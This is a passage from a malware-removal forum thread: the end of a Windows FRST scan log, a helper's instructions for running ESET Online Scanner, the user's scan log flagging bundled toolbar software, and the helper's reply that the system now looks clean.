2014-09-10 13:38 - 2014-08-18 16:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-10 13:38 - 2014-08-18 16:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-10 13:38 - 2014-08-18 16:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-10 13:38 - 2014-08-18 16:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-10 13:38 - 2014-08-18 16:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-10 13:38 - 2014-08-18 16:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-10 13:38 - 2014-08-18 15:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-10 13:38 - 2014-08-18 15:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-10 13:38 - 2014-08-18 15:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-10 13:35 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-10 12:16 - 2014-06-23 21:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-09-10 12:13 - 2014-07-06 20:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-10 12:13 - 2014-07-06 20:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-10 12:07 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-10 11:55 - 2014-09-04 20:52 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-10 11:55 - 2014-09-04 20:47 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-10 11:28 - 2014-09-11 12:27 - 00001020 _____ () C:\Windows\setupact.log
2014-09-10 11:28 - 2014-09-10 11:28 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-10 10:59 - 2014-09-10 10:59 - 00000000 ____D () C:\Windows\pss
2014-09-10 10:55 - 2014-09-11 12:26 - 00206584 _____ () C:\Windows\WindowsUpdate.log
2014-09-10 10:51 - 2014-09-10 10:51 - 00211818 _____ () C:\Users\Paul\Documents\cc_20140910_105122.reg
2014-09-10 09:05 - 2014-09-10 09:05 - 00000967 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-10 09:05 - 2014-09-10 09:05 - 00000000 ____D () C:\Program Files\CCleaner
2014-09-10 09:04 - 2014-09-10 09:04 - 04901352 _____ (Piriform Ltd) C:\Users\Paul\Downloads\ccsetup417.exe
2014-09-09 14:57 - 2014-09-09 15:01 - 00000000 ____D () C:\SERT
2014-09-06 08:16 - 2014-09-10 10:13 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamswissarmy.sys
2014-09-06 08:14 - 2014-09-06 08:14 - 00000000 ____D () C:\found.000
2014-09-06 07:29 - 2014-09-06 07:29 - 00001062 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-06 07:29 - 2014-09-06 07:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-06 07:29 - 2014-09-06 07:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-06 07:29 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-06 07:29 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-06 06:50 - 2014-09-06 06:50 - 00000065 ____H () C:\Windows\system32\38891.bat
2014-08-29 10:21 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-08-29 10:21 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-08-29 10:21 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-08-29 10:21 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-08-29 10:18 - 2014-08-22 20:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-29 10:18 - 2014-08-22 19:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-29 10:18 - 2014-07-15 21:46 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-29 10:18 - 2014-07-13 20:42 - 00654336 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2014-08-29 10:18 - 2014-06-24 20:41 - 12874240 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-08-29 10:18 - 2014-06-15 20:44 - 00730048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2014-08-29 10:18 - 2014-06-15 20:44 - 00219072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2014-08-29 10:18 - 2014-06-15 20:40 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2014-08-29 10:18 - 2014-06-03 04:30 - 00101824 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-08-29 10:18 - 2014-06-03 04:29 - 02363392 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-08-29 10:18 - 2014-06-03 04:29 - 01805824 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-08-29 10:18 - 2014-06-03 04:29 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-08-28 10:02 - 2014-08-28 10:02 - 00002104 _____ () C:\Users\Public\Desktop\Carbonite InfoCenter.lnk
2014-08-28 10:02 - 2014-08-28 10:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Carbonite
2014-08-28 10:01 - 2014-08-28 10:02 - 00000086 _____ () C:\Users\Public\Desktop\Carbonite Setup.log
2014-08-23 06:25 - 2014-05-14 11:23 - 00054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2014-08-23 06:25 - 2014-05-14 11:23 - 00045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2014-08-23 06:24 - 2014-05-14 11:23 - 01973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2014-08-23 06:24 - 2014-05-14 11:23 - 00581600 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2014-08-23 06:24 - 2014-05-14 11:23 - 00036320 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2014-08-23 06:24 - 2014-05-14 11:17 - 02425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2014-08-23 06:24 - 2014-05-14 11:17 - 00092672 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2014-08-23 06:24 - 2014-05-14 09:23 - 00179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2014-08-23 06:24 - 2014-05-14 09:17 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2014-08-22 09:32 - 2014-08-22 09:32 - 00000978 _____ () C:\Users\Public\Desktop\Stamps.com.lnk
2014-08-22 09:32 - 2014-08-22 09:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stamps.com
2014-08-22 09:32 - 2014-08-22 09:32 - 00000000 ____D () C:\ProgramData\{15443AB6-DA1B-46B5-A9BB-1311ED40AB1A}
2014-08-22 09:30 - 2013-09-23 13:48 - 00147912 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\HipShieldK.sys
2014-08-19 07:46 - 2014-08-19 07:46 - 00001755 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\Program Files\iPod
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-11 12:37 - 2014-09-10 14:20 - 00000000 ____D () C:\FRST
2014-09-11 12:35 - 2014-05-09 11:58 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-296848781-3995833910-2275520707-1001UA1cf6ba7e2bf6cd8.job
2014-09-11 12:35 - 2009-07-13 23:34 - 00031312 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-11 12:35 - 2009-07-13 23:34 - 00031312 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-11 12:32 - 2010-11-20 16:01 - 00801238 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-11 12:28 - 2014-09-11 12:27 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink PowerDVD 9.5
2014-09-11 12:27 - 2014-09-10 13:43 - 00001484 _____ () C:\Windows\PFRO.log
2014-09-11 12:27 - 2014-09-10 11:28 - 00001020 _____ () C:\Windows\setupact.log
2014-09-11 12:27 - 2011-10-01 07:29 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-11 12:27 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-11 12:26 - 2014-09-10 10:55 - 00206584 _____ () C:\Windows\WindowsUpdate.log
2014-09-11 12:19 - 2014-06-22 09:14 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cf8e2452dd23be.job
2014-09-11 11:53 - 2012-04-13 05:42 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-11 11:37 - 2011-10-09 10:37 - 00000000 ____D () C:\Program Files\Common Files\Mcafee
2014-09-11 11:12 - 2014-09-11 11:12 - 00053903 _____ () C:\ComboFix.txt
2014-09-11 11:12 - 2014-09-11 09:49 - 00000000 ____D () C:\Qoobox
2014-09-11 11:12 - 2009-07-13 21:37 - 00000000 __RHD () C:\Users\Default
2014-09-11 11:12 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-09-11 11:10 - 2014-09-11 09:45 - 00000000 ____D () C:\Windows\erdnt
2014-09-11 11:10 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-09-11 11:08 - 2011-09-28 06:36 - 00000000 ____D () C:\Users\Paul
2014-09-11 10:38 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-11 09:41 - 2014-09-11 09:57 - 05576769 ____R (Swearware) C:\Users\Paul\Desktop\ComboFix.exe
2014-09-10 13:35 - 2013-08-15 03:05 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-10 12:42 - 2011-10-09 06:26 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-09-10 12:41 - 2014-04-24 08:34 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-09-10 11:28 - 2014-09-10 11:28 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-10 10:59 - 2014-09-10 10:59 - 00000000 ____D () C:\Windows\pss
2014-09-10 10:51 - 2014-09-10 10:51 - 00211818 _____ () C:\Users\Paul\Documents\cc_20140910_105122.reg
2014-09-10 10:50 - 2011-11-06 10:57 - 00000000 ____D () C:\Users\Paul\AppData\Roaming\Skype
2014-09-10 10:50 - 2011-02-10 11:03 - 00000000 ____D () C:\Windows\panther
2014-09-10 10:13 - 2014-09-06 08:16 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamswissarmy.sys
2014-09-10 09:53 - 2011-09-28 06:50 - 00002365 _____ () C:\Users\Paul\Desktop\Google Chrome.lnk
2014-09-10 09:05 - 2014-09-10 09:05 - 00000967 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-10 09:05 - 2014-09-10 09:05 - 00000000 ____D () C:\Program Files\CCleaner
2014-09-10 09:04 - 2014-09-10 09:04 - 04901352 _____ (Piriform Ltd) C:\Users\Paul\Downloads\ccsetup417.exe
2014-09-10 08:55 - 2012-04-13 05:42 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-09-10 08:55 - 2011-09-19 11:22 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-09-10 07:09 - 2011-09-29 17:24 - 00000000 ____D () C:\Users\Paul\Documents\Outlook Files
2014-09-10 05:35 - 2014-03-29 06:30 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-296848781-3995833910-2275520707-1001Core1cf4b42484e052c.job
2014-09-09 15:56 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-09-09 15:01 - 2014-09-09 14:57 - 00000000 ____D () C:\SERT
2014-09-06 11:49 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\LogFiles
2014-09-06 08:14 - 2014-09-06 08:14 - 00000000 ____D () C:\found.000
2014-09-06 07:30 - 2014-02-06 14:12 - 00000000 ____D () C:\Users\Paul\AppData\Roaming\Malwarebytes
2014-09-06 07:29 - 2014-09-06 07:29 - 00001062 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-06 07:29 - 2014-09-06 07:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-06 07:29 - 2014-09-06 07:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-06 07:29 - 2014-02-06 14:12 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-06 07:29 - 2014-02-06 14:12 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2014-09-06 07:02 - 2011-10-09 10:02 - 00000000 ____D () C:\ProgramData\McAfee
2014-09-06 06:50 - 2014-09-06 06:50 - 00000065 ____H () C:\Windows\system32\38891.bat
2014-09-04 20:52 - 2014-09-10 11:55 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-04 20:47 - 2014-09-10 11:55 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-08-29 10:33 - 2009-07-13 23:33 - 00416160 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-28 10:02 - 2014-08-28 10:02 - 00002104 _____ () C:\Users\Public\Desktop\Carbonite InfoCenter.lnk
2014-08-28 10:02 - 2014-08-28 10:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Carbonite
2014-08-28 10:02 - 2014-08-28 10:01 - 00000086 _____ () C:\Users\Public\Desktop\Carbonite Setup.log
2014-08-22 20:46 - 2014-08-29 10:18 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-22 19:42 - 2014-08-29 10:18 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-22 09:32 - 2014-08-22 09:32 - 00000978 _____ () C:\Users\Public\Desktop\Stamps.com.lnk
2014-08-22 09:32 - 2014-08-22 09:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stamps.com
2014-08-22 09:32 - 2014-08-22 09:32 - 00000000 ____D () C:\ProgramData\{15443AB6-DA1B-46B5-A9BB-1311ED40AB1A}
2014-08-22 09:32 - 2013-12-11 10:01 - 00000000 ____D () C:\Users\Paul\AppData\Roaming\Stamps.com Internet Postage
2014-08-22 09:32 - 2013-12-11 10:00 - 00000036 ____H () C:\Windows\system32\f9t.dat
2014-08-22 09:32 - 2013-12-11 10:00 - 00000000 ____D () C:\Program Files\Stamps.com Internet Postage
2014-08-19 12:39 - 2014-09-10 13:38 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-08-19 07:46 - 2014-08-19 07:46 - 00001755 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\Program Files\iPod
2014-08-19 07:46 - 2011-10-01 07:59 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-08-19 07:46 - 2011-09-30 15:47 - 00000000 ____D () C:\Program Files\iTunes
2014-08-18 17:26 - 2014-09-10 13:38 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-18 17:08 - 2014-09-10 13:38 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-18 16:57 - 2014-09-10 13:38 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-18 16:57 - 2014-09-10 13:38 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-08-18 16:46 - 2014-09-10 13:38 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-18 16:45 - 2014-09-10 13:38 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-08-18 16:44 - 2014-09-10 13:38 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-08-18 16:44 - 2014-09-10 13:38 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-08-18 16:42 - 2014-09-10 13:38 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-18 16:39 - 2014-09-10 13:38 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-18 16:39 - 2014-09-10 13:38 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-08-18 16:37 - 2014-09-10 13:38 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-18 16:36 - 2014-09-10 13:38 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-18 16:36 - 2014-09-10 13:38 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-08-18 16:35 - 2014-09-10 13:38 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-08-18 16:30 - 2014-09-10 13:38 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-08-18 16:27 - 2014-09-10 13:38 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-18 16:22 - 2014-09-10 13:38 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-08-18 16:19 - 2014-09-10 13:38 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-08-18 16:17 - 2014-09-10 13:38 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-18 16:17 - 2014-09-10 13:38 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-18 16:15 - 2014-09-10 13:38 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-18 16:09 - 2014-09-10 13:38 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-18 16:08 - 2014-09-10 13:38 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-18 16:08 - 2014-09-10 13:38 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-08-18 16:07 - 2014-09-10 13:38 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-08-18 15:46 - 2014-09-10 13:38 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-18 15:38 - 2014-09-10 13:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-18 15:36 - 2014-09-10 13:38 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-08-12 08:11 - 2011-09-19 11:28 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DW WLAN
2014-08-12 08:11 - 2011-09-19 11:28 - 00000000 ____D () C:\Windows\system32\vs08
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-TW
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-CN
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\th-TH
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\sv-SE
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\sl-SI
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\sk-SK
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ru-RU
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ro-RO
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-PT
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-BR
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pl-PL
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nl-NL
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nb-NO
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\lv-LV
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\lt-LT
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ko-KR
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ja-JP
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\it-IT
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\hu-HU
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\et-EE
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Help
2014-08-12 08:10 - 2011-09-19 11:28 - 07348224 _____ (Dell Inc.) C:\Windows\system32\BCMWLCPL.CPL
2014-08-12 08:10 - 2011-09-19 11:28 - 04513792 _____ (Dell Inc.) C:\Windows\system32\bcmttls.dll
2014-08-12 08:10 - 2011-09-19 11:28 - 02682880 _____ (Microsoft Corporation) C:\Windows\system32\vcredist_x86.exe
2014-08-12 08:10 - 2011-09-19 11:28 - 01022976 _____ (Dell Inc.) C:\Windows\system32\BCMLogon.dll
2014-08-12 08:10 - 2011-09-19 11:28 - 00057344 _____ (Broadcom Corporation) C:\Windows\system32\bcmwlrmt.dll
2014-08-12 08:10 - 2011-09-19 11:28 - 00051712 _____ (Broadcom Corporation) C:\Windows\system32\wltrynt.dll
2014-08-12 08:10 - 2011-09-19 11:28 - 00050704 _____ (CACE Technologies, Inc.) C:\Windows\system32\Drivers\npf.sys
2014-08-12 08:10 - 2011-09-19 11:28 - 00018424 _____ (Broadcom Corporation) C:\Windows\system32\Drivers\bcm42rly.sys
2014-08-12 08:10 - 2011-09-19 11:28 - 00006656 _____ () C:\Windows\system32\bcmwlrc.dll
2014-08-12 08:10 - 2011-09-19 11:28 - 00000457 _____ () C:\Windows\system32\vcredist_x86.bat
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\hr-HR
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\he-IL
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fr-FR
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fi-FI
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\el-GR
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\de-DE
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\bg-BG
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ar-SA
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-09 15:48
 
==================== End Of Log ============================


#8 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:46 PM

Posted 11 September 2014 - 01:08 PM

Ok, this worked well. How is your computer running now?


Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administartor privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!

#9 morris79

morris79
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:10:46 AM

Posted 12 September 2014 - 09:17 AM

Here it is.

 

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=ee63a0925bd6b44eabbe0dbaa1fac6d1
# engine=20112
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-09-12 01:46:04
# local_time=2014-09-12 08:46:04 (-0600, Central Daylight Time)
# country="United States"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1='McAfee Anti-Virus and Anti-Spyware'
# compatibility_mode=5124 16777214 88 100 0 172392942 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 35991365 162074355 0 0
# scanned=148226
# found=6
# cleaned=0
# scan_time=69996
sh=0BB64F54CAA8A47889A19FC122706A789656E0AA ft=1 fh=96ba92304b133aaf vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application" ac=I fn="C:\Program Files\Ask.com\precache.exe"
sh=C6BFD87DFA88D2079A16DC77887D9A4CC133B274 ft=1 fh=8e4a37a044b6b1cc vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application" ac=I fn="C:\Program Files\Ask.com\SaUpdate.exe"
sh=C2EAFF8EE17CAA897838770F3344B4822A587CBF ft=1 fh=e234678fdc8a8642 vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application" ac=I fn="C:\Program Files\Ask.com\UpdateTask.exe"
sh=51E5F9D19ED3EC2EEFCB4BF3B2105A464BEC2D4A ft=1 fh=6931b7fb73b262fc vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application" ac=I fn="C:\Program Files\Ask.com\Updater\Updater.exe"
sh=1DE5D70A411EBBF4441FD569E7427CC28A4D6B13 ft=1 fh=b572351b8a033ea9 vn="Win32/Bundled.Toolbar.Google.D potentially unsafe application" ac=I fn="C:\Users\Paul\Downloads\ccsetup417.exe"
sh=B88878620FC04B52A91500A58C7D60D1A98AB7A6 ft=0 fh=0000000000000000 vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application" ac=I fn="C:\Windows\Installer\87881b.msi"
 



#10 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:46 PM

Posted 12 September 2014 - 09:28 AM

It's looking good. :)

That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation: btn_donate_SM.gif.
Thank you!



Clean Up

